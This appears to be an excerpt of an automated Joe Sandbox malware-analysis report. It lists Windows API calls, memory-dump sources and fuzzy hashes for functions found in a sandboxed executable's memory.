                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E88271,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?), ref: 00E896F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E896E4: lstrcpyW.KERNEL32(00000000,?,?,00E88271,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E89719
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E896E4: lstrcmpiW.KERNEL32(00000000,?,00E88271,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?), ref: 00E8974A
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E8828A
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E882B0
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E890BB,00000000,?,0000001C,?,?,00000000), ref: 00E882EB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00EB615A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB616C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB6177
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB62B5
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00E82394
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E823A6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E823BC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E823D7
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E8EB14
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00E8EB47
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E8EB5D
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E8EB64
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00E4D369,00000000,00000004,00000000), ref: 00E4D588
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E4D594
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E4D59B
                                                                                                                                                                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00E4D5B9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E278B1
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00E278C5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E278CF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00E5338D,00000364,00000000,00000000,00000000,?,00E535FE,00000006,FlsSetValue), ref: 00E53418
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00E5338D,00000364,00000000,00000000,00000000,?,00E535FE,00000006,FlsSetValue,00EC3260,FlsSetValue,00000000,00000364,?,00E531B9), ref: 00E53424
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E5338D,00000364,00000000,00000000,00000000,?,00E535FE,00000006,FlsSetValue,00EC3260,FlsSetValue,00000000), ref: 00E53432
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BA8B
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BAB0
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BABA
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E8B69A,?,00008000), ref: 00E8BAED
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c62607a79d287f298c4f797f562fde73ae5f355917e0192bebe4f8cc3bc453d7
                                                                                                                                                                                                                                                                                                    • Instruction ID: f852848f15937c0c6dbaf6c3eb56a9725c8052d60508808ca86e04066717ac88
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c62607a79d287f298c4f797f562fde73ae5f355917e0192bebe4f8cc3bc453d7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB117C74C05519DBCF08AFA9E9486EEBB78BF09711F101185D549B2240DB305654CB61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00EB888E
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00EB88A6
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00EB88CA
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EB88E5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4f1775b8d6e3e63c72d52fbb3aa4651eb14a8d0f10450d27b3c41436cde11327
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8cd27e08a78f3b3c410394e073224cd63eb4b1cf4014c3ab6dbbe840598a71a3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f1775b8d6e3e63c72d52fbb3aa4651eb14a8d0f10450d27b3c41436cde11327
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E1140B9D04209AFDB41CFA9D884AEEBBB9FB08314F508166E915E2214E735AA54CF50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E83712
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E83723
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E8372A
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E83731
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cc957a18dd5f0287189fd334f64dbb2b15e23b6c96a7e328e840a27374a95314
                                                                                                                                                                                                                                                                                                    • Instruction ID: 246ef4e9154e662cf3fcaacb88090a5b91e3cf89beeae95d6500fe19bfe092cc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc957a18dd5f0287189fd334f64dbb2b15e23b6c96a7e328e840a27374a95314
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49E06DF11052247EDA2027A39C4DEEB7F6CDB42BA5F400116F10EF2090EAA1C944C2B0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E21F87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21F96
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: BeginPath.GDI32(?), ref: 00E21FAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21F2D: SelectObject.GDI32(?,00000000), ref: 00E21FD6
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00EB92E3
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00EB92F0
                                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00EB9300
                                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00EB930E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 629d43f1e0ed0423fb01b9aa72ec8e74bff5abc1f756b3268e467270c8be3424
                                                                                                                                                                                                                                                                                                    • Instruction ID: b8c4d7a764df83ea25de53c80d2afd1cab8ebe0a9453881566bc9a1fc9ef92bc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 629d43f1e0ed0423fb01b9aa72ec8e74bff5abc1f756b3268e467270c8be3424
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF03A3200A269BBDB126F55AC0AFDB3AAAAF4A324F048100FB11710E2D7B55525DFA5
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00E221BC
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00E221C6
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00E221D9
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00E221E1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 00cba81d7d379d3bbf256ba1cb0677ede63a129474a73097d24a7889166a9a1c
                                                                                                                                                                                                                                                                                                    • Instruction ID: c2da4141eb5aa13d9443ac4158c348d62d5d3582f3ce626174418f946ea2de7b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00cba81d7d379d3bbf256ba1cb0677ede63a129474a73097d24a7889166a9a1c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBE09B31245240BEDB215F79BC09BE93B51EB11339F048329F7F6740E0D77146449B10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00E7EC36
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00E7EC40
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E7EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00E7EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 33a38e7389398f3f46bb508e70438a4e98b5e80839eead294a335a9b968e2c12
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b1cd869bcd5eb7d421d9a1189e8c6ce2432e669f82d82f663a0a7a9157d20d0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33a38e7389398f3f46bb508e70438a4e98b5e80839eead294a335a9b968e2c12
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E01AB4C08205DFCB41AFA1DD08A9EBBB1EB08310F108559E84AF3350D7385905EF10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00E7EC4A
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00E7EC54
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E7EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00E7EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ce43a555b96793f63ff85ec5a5ace4d8bc3486c02099aea027d944db798a3285
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9fd085604676e653191862e75c4b1e872b5cd3e7c434abc7f1bfbe0b1cced207
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce43a555b96793f63ff85ec5a5ace4d8bc3486c02099aea027d944db798a3285
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1E012B0C08205EFCB41AFA1DC08A9EBBB1AB08310F108519E84AF33A0EB386905DF00
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                                    • String ID: @COM_EVENTOBJ$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-192135924
                                                                                                                                                                                                                                                                                                    • Opcode ID: d8d4b3cf19a43ca651fe0dee458b1a11a587a53657cbe315753c89d4f9a19ce7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 234bd3989b622252589b79d802e8512ebc2070fd8009596a534a7aa5b750e289
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8d4b3cf19a43ca651fe0dee458b1a11a587a53657cbe315753c89d4f9a19ce7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFF17071A083009FD718DF24C841B6AB7E1BF84708F14996DF58AB72A1D771EE45DB82
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E405B2: EnterCriticalSection.KERNEL32(00EF170C,?,00000000,?,00E2D22A,00EF3570,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?), ref: 00E405BD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E405B2: LeaveCriticalSection.KERNEL32(00EF170C,?,00E2D22A,00EF3570,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?,00000001,00EF2430), ref: 00E405FA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40413: __onexit.LIBCMT ref: 00E40419
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00EA8658
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40568: EnterCriticalSection.KERNEL32(00EF170C,00000000,?,00E2D258,00EF3570,00E627C9,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?), ref: 00E40572
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E40568: LeaveCriticalSection.KERNEL32(00EF170C,?,00E2D258,00EF3570,00E627C9,00000001,00000000,?,?,00E9F023,?,?,00000000,00000001,?,00000001), ref: 00E405A5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
